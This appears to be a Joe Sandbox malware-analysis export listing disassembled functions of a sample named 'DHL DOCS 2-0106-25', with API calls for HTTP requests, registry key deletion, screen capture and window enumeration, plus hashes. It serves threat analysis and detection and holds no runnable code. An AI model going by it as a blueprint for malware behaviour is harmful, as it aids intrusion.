Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 2b4bddc3fd8107d7e5094322c2db529b85479f089fcbe61b1f2af02dc93ad141
Instruction ID: 73fd9e257beca4bc953a0bbf5c8e73ce1de4c711a34b9650e8a52f0eec7d834d
Opcode Fuzzy Hash: 2b4bddc3fd8107d7e5094322c2db529b85479f089fcbe61b1f2af02dc93ad141
Instruction Fuzzy Hash: 3671FC70641209BEEB258F68DC49FEABF64FF05364F204216F625AA1D1C7B1AD60DB90

Function 001C8BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001C8BE8,?,00000000,?,?,?,?,001C8BBA,00000000,?), ref: 001C8FC5

DestroyWindow.USER32(?), ref: 001C8C81
KillTimer.USER32(00000000,?,?,?,?,001C8BBA,00000000,?), ref: 001C8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00206973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001C8BBA,00000000,?), ref: 002069A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001C8BBA,00000000,?), ref: 002069B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001C8BBA,00000000), ref: 002069D4
DeleteObject.GDI32(00000000), ref: 002069E6

Strings

8], xrefs: 001C8C06

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: 8]
API String ID: 641708696-438778366
Opcode ID: 9ac24c4aca136cefb8c6d1b54d314fecd3d6cb390b4b1c1f0fc39f1e40d63c19
Instruction ID: ef17be26b1df8e0a766dddff4a015aba2b9e8d0bae6c34a4adcdc7d21226dadf
Opcode Fuzzy Hash: 9ac24c4aca136cefb8c6d1b54d314fecd3d6cb390b4b1c1f0fc39f1e40d63c19
Instruction Fuzzy Hash: 5B61B934112701DFDB259F18E98CB6AB7B1FB61312F24441CE0429B9A0CB35ECA1DFA8

Function 0022C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0022C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0022C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0022C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0022C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0022C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0022C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0022C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0022C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0022C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0022C5F0
InternetCloseHandle.WININET(00000000), ref: 0022C5FB

Strings

, xrefs: 0022C575

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 99be4097b0bfd9db16d417c7304207fd13788054a31b283d00a6d019be8f2e6c
Instruction ID: 7493dc16f6aa985d18119a75e45ed99f127bd3f1bd66a56e41d0a3e8260dbb98
Opcode Fuzzy Hash: 99be4097b0bfd9db16d417c7304207fd13788054a31b283d00a6d019be8f2e6c
Instruction Fuzzy Hash: CA518BB4110619BFDB219FA4ED88AAF7BFCFF09354F20441AF945A6210DB74E924DB60

Function 001C9838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

GetSysColor.USER32(0000000F), ref: 001C9862

Strings

8], xrefs: 001C987C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ColorLongWindow
String ID: 8]
API String ID: 259745315-438778366
Opcode ID: a6dd89755ea0146d73212460bbcf526f77a36cec3922419f9b12021321947b90
Instruction ID: adce8a2564826bdb0137e0d76bb4255f16374120ab9b5ed4e340e7d16b4f33b0
Opcode Fuzzy Hash: a6dd89755ea0146d73212460bbcf526f77a36cec3922419f9b12021321947b90
Instruction Fuzzy Hash: 07419E35505644AFDB205F38AC8CFB93BA5AB27330F244659F9A68B2E2C731DD42DB10

Function 0024856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00248592
GetFileSize.KERNEL32(00000000,00000000), ref: 002485A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 002485AD
CloseHandle.KERNEL32(00000000), ref: 002485BA
GlobalLock.KERNEL32(00000000), ref: 002485C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002485D7
GlobalUnlock.KERNEL32(00000000), ref: 002485E0
CloseHandle.KERNEL32(00000000), ref: 002485E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002485F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0024FC38,?), ref: 00248611
GlobalFree.KERNEL32(00000000), ref: 00248621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00248641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00248671
DeleteObject.GDI32(00000000), ref: 00248699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002486AF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1659299be8fc7464ef15ba6605c1627f1798062a12b75b3c3b1a31a73d47d414
Instruction ID: b043049b0dc04346f42896d53f9e8cd942e8831ceba4e0ec676bdf7ea1d2993d
Opcode Fuzzy Hash: 1659299be8fc7464ef15ba6605c1627f1798062a12b75b3c3b1a31a73d47d414
Instruction Fuzzy Hash: 32412B75611205AFDB55DFA9DC4CEAE7BBCEF8AB11F114058F909E7260DB709901CB20

Function 002214BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00221502
VariantCopy.OLEAUT32(?,?), ref: 0022150B
VariantClear.OLEAUT32(?), ref: 00221517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002215FB
VarR8FromDec.OLEAUT32(?,?), ref: 00221657
VariantInit.OLEAUT32(?), ref: 00221708
SysFreeString.OLEAUT32(?), ref: 0022178C
VariantClear.OLEAUT32(?), ref: 002217D8
VariantClear.OLEAUT32(?), ref: 002217E7
VariantInit.OLEAUT32(00000000), ref: 00221823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00221625
Default, xrefs: 002216AF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 577e6784ea510c4aae929f7f38d467bb32576ecacc9802a59b380cf3ee4f4012
Instruction ID: 33d4c7d1c25eda0e86a973d0267ad0153fef9f4ff8d4fbfc5c73b894aab90bb6
Opcode Fuzzy Hash: 577e6784ea510c4aae929f7f38d467bb32576ecacc9802a59b380cf3ee4f4012
Instruction Fuzzy Hash: 34D1CF71A20225EBDB109FA5E885FB9B7B5BF65700F60809AF406AB180DB70DC71DB61

Function 0023B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 0023C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0023B6AE,?,?), ref: 0023C9B5
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023C9F1
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA68
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0023B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0023B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0023B80A
RegCloseKey.ADVAPI32(?), ref: 0023B87E
RegCloseKey.ADVAPI32(?), ref: 0023B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0023B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0023B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0023B922
FreeLibrary.KERNEL32(00000000), ref: 0023B983
RegCloseKey.ADVAPI32(00000000), ref: 0023B994

Strings

RegDeleteKeyExW, xrefs: 0023B8FE
advapi32.dll, xrefs: 0023B8ED

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 608e61f0d80dea04a96ae42a4a63292716c20c9f95e9a3a6b31d4c0bdccb2566
Instruction ID: 00b33d6b89ed187847007b9f62d0fdadced01b0a5fbb67d2357976750793b978
Opcode Fuzzy Hash: 608e61f0d80dea04a96ae42a4a63292716c20c9f95e9a3a6b31d4c0bdccb2566
Instruction Fuzzy Hash: 5FC18B75214202AFD711DF18C495F6ABBE5FF84308F24849CF69A8B2A2CB71EC45CB91

Function 0024541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00245504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00245515
CharNextW.USER32(00000158), ref: 00245544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00245585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0024559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002455AC

Strings

8], xrefs: 0024545F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$CharNext
String ID: 8]
API String ID: 1350042424-438778366
Opcode ID: 0f95e3d83770feb5053db2f9d4ca95b9a909677db340efb5e5dc3f3111c7fbd3
Instruction ID: 6c4218c37c53487ecdd2259cb9912860c38e8aae803e205218ea8abb2e5ff842
Opcode Fuzzy Hash: 0f95e3d83770feb5053db2f9d4ca95b9a909677db340efb5e5dc3f3111c7fbd3
Instruction Fuzzy Hash: F161C334925629EFDF188F54CC849FE7B79FF06320F108145F9A5AB292D7748AA0DB60

Function 0023255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002325D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002325E8
CreateCompatibleDC.GDI32(?), ref: 002325F4
SelectObject.GDI32(00000000,?), ref: 00232601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0023266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002326AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002326D0
SelectObject.GDI32(?,?), ref: 002326D8
DeleteObject.GDI32(?), ref: 002326E1
DeleteDC.GDI32(?), ref: 002326E8
ReleaseDC.USER32(00000000,?), ref: 002326F3

Strings

(, xrefs: 0023268D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: d67a56f1ce15c130937b1e15378103a1d7ce47c2875b37226bf730800ea4fc61
Instruction ID: a7d46dd2f288788500101e04991f131855e1f88b03fd6a95453f2319c70eddf6
Opcode Fuzzy Hash: d67a56f1ce15c130937b1e15378103a1d7ce47c2875b37226bf730800ea4fc61
Instruction Fuzzy Hash: 5C61F3B5D11219EFCF04CFA8D885EAEBBB9FF48310F208529E959A7250D770A951CF50

Function 001EDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001EDAA1

Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED659
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED66B
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED67D
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED68F
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6A1
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6B3
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6C5
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6D7
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6E9
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED6FB
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED70D
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED71F
Part of subcall function 001ED63C: _free.LIBCMT ref: 001ED731

_free.LIBCMT ref: 001EDA96

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

_free.LIBCMT ref: 001EDAB8
_free.LIBCMT ref: 001EDACD
_free.LIBCMT ref: 001EDAD8
_free.LIBCMT ref: 001EDAFA
_free.LIBCMT ref: 001EDB0D
_free.LIBCMT ref: 001EDB1B
_free.LIBCMT ref: 001EDB26
_free.LIBCMT ref: 001EDB5E
_free.LIBCMT ref: 001EDB65
_free.LIBCMT ref: 001EDB82
_free.LIBCMT ref: 001EDB9A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 472f95c058f55951b27b7dbc2d5623eb1fdaaa81e03d3cec154e40830c120d6c
Instruction ID: 6226d0d098318982a14b1d1415d21a4421928ed2f58b0d42cdc3c93da7b6f376
Opcode Fuzzy Hash: 472f95c058f55951b27b7dbc2d5623eb1fdaaa81e03d3cec154e40830c120d6c
Instruction Fuzzy Hash: 23318D31604B889FEB25AA3AF846B5EB7E8FF61314F125429E458D7192EF35ED40C720

Function 0021365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0021369C
_wcslen.LIBCMT ref: 002136A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00213797
GetClassNameW.USER32(?,?,00000400), ref: 0021380C
GetDlgCtrlID.USER32(?), ref: 0021385D
GetWindowRect.USER32(?,?), ref: 00213882
GetParent.USER32(?), ref: 002138A0
ScreenToClient.USER32(00000000), ref: 002138A7
GetClassNameW.USER32(?,?,00000100), ref: 00213921
GetWindowTextW.USER32(?,?,00000400), ref: 0021395D

Strings

%s%u, xrefs: 00213734

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 07bbbe6acad0d3ecf1b81e55f96136e51c07bb194cf489ef68719ef1e745f310
Instruction ID: 38579a3cc89ab395ca69347fe948bd402fba1046348a299942d1b62aae4ef309
Opcode Fuzzy Hash: 07bbbe6acad0d3ecf1b81e55f96136e51c07bb194cf489ef68719ef1e745f310
Instruction Fuzzy Hash: 7F91D071214607AFD718DF24C884BEAF7EAFF64310F108529F999D2190DB30AAA5CB91

Function 00214954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00214994
GetWindowTextW.USER32(?,?,00000400), ref: 002149DA
_wcslen.LIBCMT ref: 002149EB
CharUpperBuffW.USER32(?,00000000), ref: 002149F7
_wcsstr.LIBVCRUNTIME ref: 00214A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00214A64
GetWindowTextW.USER32(?,?,00000400), ref: 00214A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00214AE6
GetClassNameW.USER32(?,?,00000400), ref: 00214B20
GetWindowRect.USER32(?,?), ref: 00214B8B

Strings

ThumbnailClass, xrefs: 00214A6F, 00214AF1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: e8eaf368b290c9f819f625d1a8a1d1c2e1e11430046c2de598a1c6f6c98a45cd
Instruction ID: d55962fa9efa30eda4bc72f725f6e693c087af852f152f18da3081170258ee8b
Opcode Fuzzy Hash: e8eaf368b290c9f819f625d1a8a1d1c2e1e11430046c2de598a1c6f6c98a45cd
Instruction Fuzzy Hash: 9491E6714182069FDB04EF14C885FEA77E8FFA4314F04846AFD899A195DB30ED95CBA1

Function 00243A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00243A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00243AA0
GetWindowLongW.USER32(?,000000F0), ref: 00243AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00243AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00243B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00243BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00243BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00243BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00243BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00243C13

Strings

8], xrefs: 00243A67, 00243A76, 00243AAC, 00243B01, 00243C2A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID: 8]
API String ID: 312131281-438778366
Opcode ID: 411f8e6ad46436f6d04f4bc2841a89c475908ad4b5b7cb32e80da4039e7befc1
Instruction ID: 158b2aefe43ce33b395076d9029ea1edc27416f39ea428bf9bf3c563a381eb1c
Opcode Fuzzy Hash: 411f8e6ad46436f6d04f4bc2841a89c475908ad4b5b7cb32e80da4039e7befc1
Instruction Fuzzy Hash: 90618A75A00208AFDB15DFA8CC85EEE77B8EB09704F10419AFA15E72A1C770AE56DF50

Function 0023CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0023CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0023CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0023CD48

Part of subcall function 0023CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0023CCAA
Part of subcall function 0023CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0023CCBD
Part of subcall function 0023CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0023CCCF
Part of subcall function 0023CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0023CD05
Part of subcall function 0023CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0023CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0023CCF3

Strings

RegDeleteKeyExW, xrefs: 0023CCC9
advapi32.dll, xrefs: 0023CCB8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
